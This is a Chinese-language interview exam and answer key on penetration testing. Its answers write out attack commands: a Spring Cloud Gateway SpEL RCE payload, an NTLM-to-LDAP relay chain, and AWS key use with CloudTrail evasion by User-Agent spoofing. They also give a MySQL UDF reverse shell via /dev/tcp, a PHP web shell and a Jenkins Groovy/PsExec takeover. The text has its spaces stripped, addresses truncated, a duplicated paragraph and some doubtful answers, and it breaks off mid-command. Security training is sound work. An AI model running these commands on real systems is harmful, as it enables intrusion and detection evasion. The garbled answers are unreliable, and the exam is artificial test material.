2026年网络安全工程师面试题及渗透测试能力评估参考答案

2026年网络安全工程师面试题及渗透测试能力评估参考答案1.单选题（每题2分，共20分）1.1在一次黑盒渗透测试中，你仅拿到目标域名www.example，下列哪一条DNS记录最可能直接暴露其内网地址段？A.A记录B.CNAME记录C.TXT记录D.PTR记录答案：D解析：PTR记录常用于反向解析，若管理员把内网IP段也做了反向区域，即可通过暴力反解拿到10.x/172.16.x/192.168.x地址。1.2利用SSRF攻击访问54/latest/meta-data/成功，下一步最合理的操作是：A.直接下载/etc/passwdB.读取IAM临时凭证C.反弹Shell到公网D.上传WebShell答案：B解析：该地址为AWS元数据服务，可泄露角色临时AK/SK，进而横向移动至整个云账号。1.3以下哪条Linux命令可在不落地文件的情况下，把/bin/bash的64位编码输出到攻击机？A.`cat/bin/bash|gzip|base64`B.`xxd-p/bin/bash`C.`od-An-tx1/bin/bash`D.`base64-w0</bin/bash`答案：D解析：-w0禁用换行，可直接复制粘贴到攻击机解码。1.4在Windows横向移动中，使用PsExec需要开启的目标端口是：A.135B.139C.445D.3389答案：C解析：PsExec通过SMB445端口上传服务二进制并创建命名管道。1.5下列哪一项不是OAuth2.0授权流程中的标准参数？A.response_typeB.redirect_uriC.scopeD.stateful答案：D解析：stateful并非RFC6749标准参数，state才是防CSRF的推荐参数。1.6对JWT进行暴力破解密钥时，以下哪种方式最不可能提高成功率？A.使用GPU加速B.构造常见弱口令字典C.将alg改为noneD.将typ改为JWS答案：D解析：typ头不影响签名验证，修改none可绕过，GPU+字典可提速。1.7在Kubernetes渗透中，获取到ServiceAccountToken后，最优先验证的API路径是：A./apis/batch/v1/jobsB./api/v1/namespaces/default/podsC./apis/apps/v1/deploymentsD./version答案：D解析：先访问/version确认集群版本与连通性，再决定后续利用路径。1.8以下哪条HTTP响应头对防御点击劫持最有效？A.X-Content-Type-OptionsB.X-Frame-OptionsC.Strict-Transport-SecurityD.Content-Security-Policy答案：B解析：X-Frame-Options:DENY可直接禁止被iframe嵌套。1.9使用sqlmap进行二阶注入测试时，应添加的参数是：A.--second-urlB.--second-orderC.--riskD.--level答案：B解析：--second-order指定二阶响应页面，用于延迟回显场景。1.10在Android逆向中，哪条命令可快速提取应用原生库并查看ELF架构？A.aaptdumpbadgingB.unzip-l|grep"\.so"C.filelibnative.soD.objdump-flibnative.so答案：C解析：file命令可直接显示ELF架构（ARM/ARM64/x86）。2.多选题（每题3分，共15分，少选得1分，错选0分）2.1以下哪些方式可在无网络出网环境下，把10MB的/etc/shadow传回攻击机？A.通过DNS逐字节外带B.通过ICMP隧道C.通过Time-based盲注D.通过WebSocket反弹答案：AB解析：DNS与ICMP均可做数据通道；盲注效率太低，WebSocket需出网。2.2关于Log4j2RCE（CVE-2021-44228），下列说法正确的是：A.仅影响Log4j-core≤2.14.1B.通过JNDI注入实现C.高版本JDK默认开启trustURLCodebase可防御D.通过设置-Dlog4j2.formatMsgNoLookups=true可临时缓解答案：BD解析：A版本号错误，C高版本JDK默认关闭trustURLCodebase，但低版本仍可利用。2.3以下哪些HTTP状态码在APIfuzz阶段可初步判定为潜在越权？A.200B.401C.403D.302答案：AC解析：200可能越权成功，403可能ACL存在但可绕过；401为未授权，302为重定向。2.4在容器逃逸场景，以下哪些cgroup子系统可用来写入恶意notify_on_release？A.memoryB.devicesC.rdmaD.freezer答案：AC解析：memory与rdma子系统默认挂载且可写release_agent；devices/freezer通常无权限。2.5关于WindowsCredentialGuard，下列说法正确的是：A.基于VBS虚拟化技术B.可防止Mimikatz读取LSA内存C.需要TPM2.0支持D.关闭后需重装系统答案：ABC解析：关闭CredentialGuard只需改组策略，无需重装。3.判断题（每题1分，共10分，正确写“T”，错误写“F”）3.1使用ChaCha20-Poly1305比AES-GCM在移动端更省电。答案：T解析：ChaCha20纯软件实现效率高于AES在无线端无AES-NI场景。3.2在HTTPS站点中，只要HSTS头存在，就绝对无法降级到HTTP。答案：F解析：首次访问或浏览器缓存清空仍可能被SSLStrip。3.3对GraphQL接口进行注入测试时，传统SQL扫描器无需任何改造即可直接跑。答案：F解析：GraphQL语法与REST差异大，需改写payload与路径。3.4Linux内核开启KASLR后，/proc/kallsyms仍然显示真实地址。答案：F解析：KASLR开启后kptr_restrict=2时显示为0。3.5在iOS越狱环境下，App仍受Sandbox限制。答案：T解析：越狱仅突破签名校验，Sandbox机制仍在，需额外exploit逃逸。3.6JSONP接口返回Content-Type为application/json即可杜绝XSSI。答案：F解析：旧版浏览器仍可通过charset探测绕过，正确做法是废弃JSONP。3.7使用WireGuard时，服务端公钥泄露不会导致流量被解密。答案：T解析：WireGuard使用ECDH临时密钥，公钥泄露不影响前向保密。3.8对同一目标进行多次未授权扫描，只要未造成业务中断，就不违反《网络安全法》。答案：F解析：未授权扫描即属“侵入网络”，无论是否中断。3.9在双重NAT环境下，IPv6地址依然可被外部直接访问。答案：T解析：IPv6无NAT，每个终端全球单播地址可达，除非防火墙拦截。3.10使用gobuster时，添加-xphp,html,txt参数可同时爆破目录与扩展名。答案：T解析：-x指定扩展名，与目录字典并行爆破。4.简答题（每题10分，共30分）4.1描述一次完整的针对SpringCloudGatewaySpELRCE（CVE-2022-22947）的利用链，并给出流量层面的检测正则。答案：1)发送POST/actuator/gateway/routes/hack创建恶意路由，payload位于filters字段：`{"name":"AddResponseHeader","args":{"name":"Result","value":"#{newString(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(newString[]{\"id\"}).getInputStream()))}"}}`2)刷新路由POST/actuator/gateway/refresh3)访问任意路径触发过滤器，响应头出现命令回显。4)清理DELETE/actuator/gateway/routes/hack检测正则（Suricata）：`alerthttpanyany->any8080(msg:"SpringGatewaySpELRCE";http.request_body;pcre:"/\{.#{.Tjava解析：利用SpEL注入执行任意命令，流量特征为#{T(java.lang.Runtime)字样。4.2某电商站点采用JWT访问令牌，有效期15分钟，刷新令牌有效期7天。请给出一种安全的“滑动过期”方案，并说明如何防止重放与令牌窃取。答案：1)访问令牌JWT结构：header.payload.signature，payload包含iat、exp、jti、uid、sliding。2)服务端维护Redis白名单，key=jti，value=uid，TTL=15分钟。3)客户端在5分钟到14分钟之间携带刷新令牌调用/token/slide，服务端验证刷新令牌后：a)检查原jti存在于Redis，若不存在拒绝（已过期或被撤销）。b)生成新jti，新exp=now+15分钟，写入Redis并删除旧jti。4)为防止重放，所有写操作接口必须附加一次性nonce，服务端记录已用nonce5分钟。5)令牌窃取防御：刷新令牌绑定https指纹+IP网段异常检测，若IP变化超过/24则触发二次短信验证。解析：通过Redis白名单+一次性nonce实现滑动过期与撤销，指纹与异常检测降低窃取影响。4.3说明如何在完全无网络出网的WindowsServer2019内网机器上，通过LDAP签名中继获取DC的SYSTEM权限，并给出防御方案。答案：攻击链：1)攻击者控制内网一台工作站A，启动ntlmrelayx.py-tldap://dc.corp.local--escalate-userhack。2)诱导域管在工作站B访问攻击者伪造的SMB共享（\\A\share），触发NTLM认证。3)由于DC默认未要求LDAP签名，攻击者将NTLM中继到DC的389端口，利用默认配置写入基于资源的约束委派（RBCD）：a)添加msDS-AllowedToActOnBehalfOfOtherIdentity字段，把hack用户加入。4)攻击者以hack身份申请任意用户到DC的S4U票据，获取SYSTEM权限。防御：a)开启DomainController的LDAP签名与通道绑定（LdapEnforceChannelBinding=Always）。b)开启SMB签名（EnableSecuritySignature=1）防止中继。c)部署CredentialGuard保护NTLM哈希。d)使用ProtectedUsers组限制NTLM认证。解析：LDAP签名缺失导致中继，RBCD提供横向权限，多层签名与通道绑定可阻断。5.综合渗透题（25分）背景：目标为虚构公司“RedTechLtd.”，公网仅开放7:443，证书显示.redtech.io。经前期踩点，发现子域git.redtech.io、api.redtech.io、cdn.redtech.io。你已获得git.redtech.io上泄露的源码压缩包，其中包含文件.gitlab-ci.yml，暴露出构建脚本把AWSAKIAIOSFODNN7EXAMPLE硬编码到前端。请回答：目标为虚构公司“RedTechLtd.”，公网仅开放7:443，证书显示.redtech.io。经前期踩点，发现子域git.redtech.io、api.redtech.io、cdn.redtech.io。你已获得git.redtech.io上泄露的源码压缩包，其中包含文件.gitlab-ci.yml，暴露出构建脚本把AWSAKIAIOSFODNN7EXAMPLE硬编码到前端。请回答：5.1给出从AK到获取云账号所有S3桶的完整命令序列，并说明如何规避AWSCloudTrail告警。（5分）答案：```bashexportAWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLEexportAWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEYexportAWS_REGION=us-east-1使用仅列出权限的会话，避免高危APIawsstsget-caller-identityawss3apilist-buckets--query'Buckets[].Name'--outputtable规避告警：使用外部IP做转发代理，关闭CLI历史，添加User-Agent伪装为“AWSInternal”awsconfiguresetuser_agent"AWSInternal/1.0"```解析：list-buckets为只读，风险低；伪装UA可绕过基于UA的SIEM规则。5.2在api.redtech.io的Swagger文档中发现接口GET/internal/metrics返回401，但添加头X-Forwarded-For:后返回200并泄露Prometheus指标，其中包含env="prod"及mysql://db:3306/redtech?user=redtech&pass=P@ssw0rd123。请给出利用该MySQL凭证获取Shell的两种思路，并比较优劣。（8分）答案：思路A：通过CloudShell或同VPC的EC2作为跳板，使用mysql-hdb-uredtech-p登录，利用MySQLUDF提权：1)检查secure_file_priv为空，上传.so：`SELECT@@secure_file_priv;`2)创建表并导入十六进制so，dump到plugin目录：`SELECTunhex('7f454c46...')INTODUMPFILE'/usr/lib/mysql/plugin/udf.so';`3)创建函数do_system，执行do_system('bash-c\"bash-i>&/dev/tcp/7/4430>&1\"');优点：直接UDF提权，稳定；缺点：需plugin目录可写，且MySQL以root运行。思路B：利用SQL注入（假设存在）写入Cron：登录后执行：`SELECT"<?phpsystem(\$_GET['c']);?>"INTOOUTFILE'/var/www/html/shell.php';`再通过WebShell反弹。优点：无需UDF；缺点：需知道Web路径，且目标OS为Linux。比较：A适合Windows+高权限MySQL，B适合Linux+已知路径，二者均需同VPC网络可达。5.3在进一步横向时发现域内一台Jenkins（windows-dc.redtech.io:8080）使用域账号REDTECH\svcjenkins运行，其密码与MySQL相同。请给出通过JenkinsGroovy脚本获取DC的SYSTEM权限的完整利用链，并给出一条可在Suricata上检测的规则。（7分）答案：利用链：1)访问Jenkins/script，执行：```groovydefcmd="powershell-enc#{base64('Invoke-BinaryC:\\temp\\PsExec64.exe-accepteula-s-dcmd.exe/c\"netuserevil